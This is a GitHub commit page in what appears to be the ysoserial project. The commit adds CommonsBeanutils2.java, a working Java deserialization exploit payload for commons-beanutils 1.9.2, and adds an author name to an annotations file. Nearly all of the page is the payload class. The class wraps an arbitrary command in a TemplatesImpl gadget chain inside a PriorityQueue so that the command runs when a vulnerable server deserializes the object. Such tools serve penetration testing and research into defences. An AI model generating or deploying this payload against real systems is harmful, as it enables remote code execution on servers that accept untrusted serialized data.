Skip to content

Commit

Permalink
add CommonsBeanutils2 (#163)
Browse files Browse the repository at this point in the history
  • Loading branch information
@k4n5ha0
k4n5ha0 authored Apr 27, 2022
1 parent 4ad1131 commit 15e6aa6
Show file tree
Hide file tree
Showing 2 changed files with 46 additions and 1 deletion.
44 changes: 44 additions & 0 deletions src/main/java/ysoserial/payloads/CommonsBeanutils2.java
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,44 @@
package ysoserial.payloads;

import org.apache.commons.beanutils.BeanComparator;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;

import java.util.PriorityQueue;

// Origin Detective is PHITHON From
// https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"commons-beanutils:commons-beanutils:1.9.2"})
@Authors({Authors.K4n5ha0})
public class CommonsBeanutils2 implements ObjectPayload<Object> {

public Object getObject(final String command) throws Exception {
final Object templates = Gadgets.createTemplatesImpl(command);
// mock method name until armed
final BeanComparator comparator = new BeanComparator(null, String.CASE_INSENSITIVE_ORDER);

// create queue with numbers and basic comparator
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
// stub data for replacement later
queue.add("1");
queue.add("1");

// switch method called by comparator
Reflections.setFieldValue(comparator, "property", "outputProperties");

// switch contents of queue
final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
queueArray[0] = templates;
queueArray[1] = templates;

return queue;
}

public static void main(final String[] args) throws Exception {
PayloadRunner.run(CommonsBeanutils2.class, args);
}
}
3 changes: 2 additions & 1 deletion src/main/java/ysoserial/payloads/annotation/Authors.java
View file
Original file line number Diff line number Diff line change
Expand Up @@ -15,7 +15,7 @@
String MBECHLER = "mbechler";
String JACKOFMOSTTRADES = "JackOfMostTrades";
String MATTHIASKAISER = "matthias_kaiser";
String GEBL = "gebl" ;
String GEBL = "gebl";
String JACOBAINES = "jacob-baines";
String JASINNER = "jasinner";
String KULLRICH = "kai_ullrich";
Expand All @@ -30,6 +30,7 @@
String NAVALORENZO = "navalorenzo";
String JANG = "Jang";
String ARTSPLOIT = "artsploit";
String K4n5ha0 = "k4n5ha0";

String[] value() default {};

Expand Down

0 comments on commit 15e6aa6

Please sign in to comment.